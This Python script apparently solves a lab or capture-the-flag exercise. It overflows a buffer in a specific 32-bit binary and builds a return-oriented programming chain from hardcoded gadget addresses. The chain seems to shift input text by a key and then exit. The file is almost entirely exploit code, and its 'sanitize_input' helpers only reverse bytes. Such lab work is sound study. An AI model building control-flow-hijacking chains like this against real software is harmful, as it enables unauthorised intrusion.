
def sanitize_input(exploit_str):
	exploit_str_b = bytes.fromhex(exploit_str)
	exploit_str_split = [exploit_str_b[i:i + 1] for i in range(0, len(exploit_str_b), 1)]
	exploit_str_split.reverse()
	sanitize_exploit_str = b"".join(exploit_str_split) + b""
	return sanitize_exploit_str

def sanitize_input2(exploit_str):
    exploit_str_b = bytes.fromhex(exploit_str)
    exploit_str_split = [exploit_str_b[i:i + 1] for i in range(0, len(exploit_str_b), 1)]
    exploit_str_split.reverse()
    sanitize_exploit_str = b"\n".join(exploit_str_split) + b"\n"
    return sanitize_exploit_str

text = input("Enter the text: ")
key = input("Enter the key: ")
key = ("0"*(10-len(hex(int(key))))+hex(int(key))[2:])
payload = text.encode() + b"\n"
payload += b'A'*12 + b'\n'
payload += b"A\n"*23


glb = "080e6cbc"
glb_4 = "080e6cc4"
glb_8 = "080e6cc8"
glb_c = "080e6ccc"
glb_10 = "080e6cd0"
glb_14 = "080e6cd4"
glb_18 = "080e6cd8"
pop_eax = "080b054a"
pop_ebx = "08049022"
pop_ebp = "08049859"
pop_edx_ebx = "0805ebf9"
mov_ecx_eax = "08098db8"
mov_eax_ecx = "08098db0"
mov_eax_edx = "0805c66e"
mov_eax_dword_eax = "0805fc44"
movzx_eax_byte_eax_pop_ebx_esi_edi = "0805c89e"
mov_dword_ecx_eax_pop_ebx = "08088b4d"
mov_dword_edx_eax = "0805f932"
mov_byte_edx_al = "0806dac2" #modifies al
dec_ecx = "0808c622"
adc_cl_cl = "08049ca4"
zero = "00000000"
eleven = "0000000b"
ebx = "080e5000"
plaintext = "080e6ce0"
xchg_eax_edx = "08074696"
xchg_eax_ebp = "08062abe"
addr1 = "fff6400e" #ret_addr - ebx
xor_eax = "0804fc70"
sub_eax_ecx = "08069d78"
sub_eax_edx = "0805f980"
inc_edx = "08066194"
delta = "00000ea9" #
diff = "fffffe8c" #-93*4 
imul_eax_dword_ecx_pop_ebx = "0806b2d8"
add_ecx_ebp = "08085bb2"
add_eax_edx = "08071393"
twentysix = "0000001a"
add_esp = "0809c3c1"
jmp_eax = "08076aab"
Z = "0000005b"
A = "00000041"
ebp = "080e6ce0"
inc_dword_ecx = "0808ce95"
exit_addr = "080507f0"
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_18)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_14)
payload += sanitize_input2(mov_dword_edx_eax)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_10)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(exit_addr)
payload += sanitize_input2(mov_dword_edx_eax)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_c)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(plaintext)
payload += sanitize_input2(mov_dword_edx_eax)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(pop_eax) #loop here
payload += sanitize_input2(glb_c)
payload += sanitize_input2(mov_eax_dword_eax)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(xor_eax)
payload += sanitize_input2(mov_ecx_eax)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(eleven)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(movzx_eax_byte_eax_pop_ebx_esi_edi)
payload += sanitize_input2(ebx)
payload += sanitize_input2(glb_8)
payload += sanitize_input2(glb_8)
payload += sanitize_input2(sub_eax_edx)
payload += sanitize_input2(adc_cl_cl)
payload += sanitize_input2(mov_eax_ecx)
payload += sanitize_input2(xchg_eax_edx) 
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb)
payload += sanitize_input2(mov_ecx_eax)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(delta) 
payload += sanitize_input2(mov_dword_ecx_eax_pop_ebx)
payload += sanitize_input2(ebx)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(imul_eax_dword_ecx_pop_ebx)
payload += sanitize_input2(ebx)
payload += sanitize_input2(pop_edx_ebx)
payload += sanitize_input2(addr1)
payload += sanitize_input2(ebx)
payload += sanitize_input2(add_eax_edx)
payload += sanitize_input2(pop_ebp)
payload += sanitize_input2(ebp)
payload += sanitize_input2(jmp_eax)
payload += sanitize_input2(xor_eax)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_c)
payload += sanitize_input2(mov_eax_dword_eax)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(xor_eax)
payload += sanitize_input2(mov_ecx_eax)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(movzx_eax_byte_eax_pop_ebx_esi_edi)
payload += sanitize_input2(ebx)
payload += sanitize_input2(glb_8)
payload += sanitize_input2(glb_8)
payload += sanitize_input2(pop_edx_ebx)
payload += sanitize_input2(key)
payload += sanitize_input2(ebx)
payload += sanitize_input2(add_eax_edx)
payload += sanitize_input2(pop_edx_ebx)
payload += sanitize_input2(Z)
payload += sanitize_input2(ebx)
payload += sanitize_input2(sub_eax_edx)
payload += sanitize_input2(xchg_eax_ebp)
payload += sanitize_input2(adc_cl_cl)
payload += sanitize_input2(mov_eax_ecx)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_4)
payload += sanitize_input2(mov_ecx_eax)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(twentysix)
payload += sanitize_input2(mov_dword_ecx_eax_pop_ebx)
payload += sanitize_input2(ebx)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(imul_eax_dword_ecx_pop_ebx)
payload += sanitize_input2(ebx)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(xchg_eax_ebp)
payload += sanitize_input2(add_eax_edx)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(A)
payload += sanitize_input2(add_eax_edx)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_c)
payload += sanitize_input2(mov_eax_dword_eax)
payload += sanitize_input2(xchg_eax_edx)
payload += sanitize_input2(mov_byte_edx_al)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(glb_c)
payload += sanitize_input2(mov_ecx_eax)
payload += sanitize_input2(inc_dword_ecx)
payload += sanitize_input2(pop_eax)
payload += sanitize_input2(diff)
payload += sanitize_input2(pop_edx_ebx)
payload += sanitize_input2(glb_4)
payload += sanitize_input2(glb_4)
payload += sanitize_input2(mov_dword_edx_eax)
payload += sanitize_input2(xor_eax)
payload += sanitize_input2(add_esp)
payload += b"A"*12 + sanitize_input("000009")
exp_file_name = "payload2.exp"
exp_out = open(exp_file_name,'wb')
exp_out.write(payload)
exp_out.close()